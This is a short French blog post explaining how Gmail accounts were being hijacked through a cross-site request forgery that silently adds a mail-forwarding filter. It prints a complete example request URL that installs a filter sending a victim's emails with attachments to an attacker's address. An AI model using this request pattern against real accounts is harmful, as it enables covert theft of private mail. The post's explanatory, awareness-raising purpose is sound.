Depuis plusieurs jours, on entend parler de piratage des comptes gmail,

dernièrement le compte de Webmaster de site WebRankInfo.com été piraté

de la même façon, et plusieurs centaines de comptes tous les jours!!!

Le plus inquiétant c'est la réaction de Google, aucune déclaration sur le sujet!!!!

Après plusieurs recherches sur le Web, j'ai trouvé enfin la méthode utilisée par les pirates.

Petko D.Petkov nous explique sur son blog, l'exploit utilisé pour piéger les utilisateurs de gmail

La victime visite une page tout en étant connecté à son compte GMail.

Lors de l'affichage de la page, elle effectue un "multipart / form-data POST"

à l'une des interfaces de GMail et injecte un filtre dans la liste des filtres victime.

 Dans l'exemple ci-dessus, l'attaquant écrit un filtre, qui ressemble tout simplement

les e-mails avec pièces jointes et les transmet à un e-mail de son choix.

Ce filtre permet de transférer automatiquement tous les e-mails correspondant à la règle.

La technique utilisée dans cet exemple est connu sous le nom de Cross-site request forgery,

ou simplement mettre CSR. il s'agit tout simplement de hardcore API Web2.0 hacking.

Pour plus d'information sur cette technique, vous pouvez télécharger ce livre blanc .

Voici un exemple d'une requete utilisée pour installer un filtre :

http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=

true&cf2_email= Cet e-mail est protégé contre les robots collecteurs de mails, votre navigateur doit accepter le Javascript pour le voir &cf1_from&cf1_to&cf1_

subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter